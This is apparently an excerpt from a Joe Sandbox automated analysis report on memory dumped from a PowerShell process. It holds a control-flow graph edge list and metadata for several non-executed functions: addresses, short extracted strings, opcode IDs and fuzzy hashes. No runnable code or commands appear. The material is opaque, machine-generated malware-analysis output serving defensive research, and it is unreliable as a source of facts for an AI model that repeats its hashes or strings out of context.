1047->1057 1058 74d1de1-74d1dfb 1048->1058 1049->1058 1059 74d1e59-74d1e63 1052->1059 1060 74d1e57 1052->1060 1054 74d1e6f-74d1e71 1053->1054 1055 74d1f0a-74d1f14 1053->1055 1061 74d1e81 1054->1061 1062 74d1e73-74d1e7f 1054->1062 1065 74d1f16-74d1f1e 1055->1065 1066 74d1f21-74d1f27 1055->1066 1099 74d1ce4-74d1cf0 1057->1099 1100 74d1cf2 1057->1100 1059->1053 1060->1053 1070 74d1e83-74d1e85 1061->1070 1062->1070 1107 74d2005-74d202e 1063->1107 1108 74d1fb3-74d1fb8 1063->1108 1078 74d1fcf-74d1fd5 1064->1078 1079 74d1fc7-74d1fcc 1064->1079 1073 74d1f2d-74d1f39 1066->1073 1074 74d1f29-74d1f2b 1066->1074 1070->1055 1080 74d1e8b-74d1e8d 1070->1080 1082 74d1f3b-74d1f55 1073->1082 1074->1082 1083 74d1ab7-74d1ab9 1075->1083 1076->1083 1084 74d1fdb-74d1fe7 1078->1084 1085 74d1fd7-74d1fd9 1078->1085 1086 74d1e8f-74d1e95 1080->1086 1087 74d1ea7-74d1eae 1080->1087 1083->1016 1090 74d1abf-74d1ac6 1083->1090 1092 74d1fe9-74d2002 1084->1092 1085->1092 1094 74d1e99-74d1ea5 1086->1094 1095 74d1e97 1086->1095 1096 74d1ec6-74d1f07 1087->1096 1097 74d1eb0-74d1eb6 1087->1097 1090->1011 1101 74d1acc-74d1ad1 1090->1101 1094->1087 1095->1087 1104 74d1eb8 1097->1104 1105 74d1eba-74d1ec4 1097->1105 1109 74d1cf4-74d1cf6 1099->1109 1100->1109 1110 74d1ae9-74d1af8 1101->1110 1111 74d1ad3-74d1ad9 1101->1111 1104->1096 1105->1096 1127 74d205d-74d2078 1107->1127 1128 74d2030-74d2041 1107->1128 1109->1035 1115 74d1cfc-74d1d33 1109->1115 1110->1016 1123 74d1afe-74d1b1c 1110->1123 1112 74d1add-74d1ae7 1111->1112 1113 74d1adb 1111->1113 1112->1110 1113->1110 1133 74d1d4d-74d1d54 1115->1133 1134 74d1d35-74d1d3b 1115->1134 1123->1016 1137 74d1b22-74d1b47 1123->1137 1135 74d207a-74d208c 1127->1135 1136 74d2042-74d2056 1127->1136 1128->1136 1142 74d1d6c-74d1dad 1133->1142 1143 74d1d56-74d1d5c 1133->1143 1138 74d1d3d 1134->1138 1139 74d1d3f-74d1d4b 1134->1139 1140 74d208e-74d20ab 1135->1140 1141 74d20c5-74d20cf 1135->1141 1136->1127 1137->1016 1160 74d1b4d-74d1b54 1137->1160 1138->1133 1139->1133 1157 74d20ad-74d20bf 1140->1157 1158 74d2115-74d211a 1140->1158 1148 74d20d8-74d20de 1141->1148 1149 74d20d1-74d20d5 1141->1149 1146 74d1d5e 1143->1146 1147 74d1d60-74d1d6a 1143->1147 1146->1142 1147->1142 1153 74d20e4-74d20f0 1148->1153 1154 74d20e0-74d20e2 1148->1154 1155 74d20f2-74d2112 1153->1155 1154->1155 1157->1141 1158->1157 1162 74d1b9a-74d1bcd 1160->1162 1163 74d1b56-74d1b71 1160->1163 1177 74d1bd4-74d1bdd 1162->1177 1169 74d1b8b-74d1b8f 1163->1169 1170 74d1b73-74d1b79 1163->1170 1174 74d1b96-74d1b98 1169->1174 1172 74d1b7d-74d1b89 1170->1172 1173 74d1b7b 1170->1173 1172->1169 1173->1169 1174->1177
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1698864330.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c36c181f760636493326e60d6d9688f738b71cb7cd8cddbdada5353336beb2dd
                                                • Instruction ID: 29341efdced12ba10ba1b49ccbc14da3ace8866839333bd4d31200ab28e04f52
                                                • Opcode Fuzzy Hash: c36c181f760636493326e60d6d9688f738b71cb7cd8cddbdada5353336beb2dd
                                                • Instruction Fuzzy Hash: 0F41C6F460430A9FCF148FA48561ABB7BA1AF81650F1680A7DD848F362D735DD86C7A1

                                                Non-executed Functions

                                                Function 074D02B8 Relevance: 9.1, Strings: 7, Instructions: 322COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1698864330.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                • API String ID: 0-1608119003
                                                • Opcode ID: 8ecb8299fc42c20c1ea6f4ddb0ca400c675d2dd023b9f84c7bce4e95e088bb8b
                                                • Instruction ID: 73dd03dff057ab1c037731a4912c8e300c515a96c806f50e3f27a9a06adb7b9f
                                                • Opcode Fuzzy Hash: 8ecb8299fc42c20c1ea6f4ddb0ca400c675d2dd023b9f84c7bce4e95e088bb8b
                                                • Instruction Fuzzy Hash: F2A14AB1B443568FCB158B7994246EBBBE5AFC2610F18847BD885CB3A1DA31CC46C7A1
                                                Function 074D3F50 Relevance: 7.7, Strings: 6, Instructions: 236COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1698864330.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (Xcq$(Xcq$4'^q$4'^q$4'^q$4'^q
                                                • API String ID: 0-3593487153
                                                • Opcode ID: ae61f55b1d94f393b78b38dd85425a5f18dd6d820e6ce5cd40c71d5e449a5bb3
                                                • Instruction ID: 91f9268ddb3537b7360a3b398c539cd938eba695098dbd6810efaba5d9236dc3
                                                • Opcode Fuzzy Hash: ae61f55b1d94f393b78b38dd85425a5f18dd6d820e6ce5cd40c71d5e449a5bb3
                                                • Instruction Fuzzy Hash: 3671C6B1B0428ACFCB159E2C94246EBBBF59F96210F14847BC885CB355DA318D85C7A2
                                                Function 074D0DB8 Relevance: 7.7, Strings: 6, Instructions: 195COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1698864330.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tP^q$tP^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-2782953261
                                                • Opcode ID: 59bc732ff2ec2d85ba56f1e456d24b92dfdef4c13085eb1e1d6b95e79bae1295
                                                • Instruction ID: 2041879ed9a2138d4892cab1641a5f2e62c11d7961667a13e254d27454e6d6ee
                                                • Opcode Fuzzy Hash: 59bc732ff2ec2d85ba56f1e456d24b92dfdef4c13085eb1e1d6b95e79bae1295
                                                • Instruction Fuzzy Hash: 39516BB170430A9FD7254B29D864BE7BBA6AFC5711F24847BE085CB3A1CA71CC45C391
                                                Function 074D3B58 Relevance: 5.3, Strings: 4, Instructions: 340COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1698864330.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $aQi$$aQi$tP^q$tP^q
                                                • API String ID: 0-259278452
                                                • Opcode ID: 5519d5e73ee1cb4e777bd1d17d5269f1906e70bf3e278f215b834f8afffd6fa7
                                                • Instruction ID: a90bce14a85d9ee1b92449c3a3db2c46edf430dc7d0d26c450d03e975b734de9
                                                • Opcode Fuzzy Hash: 5519d5e73ee1cb4e777bd1d17d5269f1906e70bf3e278f215b834f8afffd6fa7
                                                • Instruction Fuzzy Hash: 7EB134B1704306DFDB218F29C8247A7BBA6AF96710F14847BE585CB381DA31CC85C7A2
                                                Function 074D3028 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1698864330.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q
                                                • API String ID: 0-2125118731
                                                • Opcode ID: 823b12563a19a4822fc90789fd5bae2e6fe4492840154bed38371d909db7fbe5
                                                • Instruction ID: d8f7a47a07a888225604f8af17988b4e07f72fd913279c4fc9e3db4a660eba97
                                                • Opcode Fuzzy Hash: 823b12563a19a4822fc90789fd5bae2e6fe4492840154bed38371d909db7fbe5
                                                • Instruction Fuzzy Hash: 312179B1704316DBDB295E2A5820BABA7D69BC1710F24C43BE585CB389CD36CC458362
                                                Function 074D3949 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1698864330.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                • API String ID: 0-2049395529
                                                • Opcode ID: 75f0aa6b1a1079dc182ddd48c7d711ff7efaaef03f894f9b4aa07c561e7f3be7
                                                • Instruction ID: 8c3858c9b8a9aa83b450648b14af95f959a53abc118742c237d2dd05f38b939a
                                                • Opcode Fuzzy Hash: 75f0aa6b1a1079dc182ddd48c7d711ff7efaaef03f894f9b4aa07c561e7f3be7
                                                • Instruction Fuzzy Hash: B6017560A1A3859FC71A1A3418345566FB69FC355071944EBD4C5CF39BC9254C4AC3A3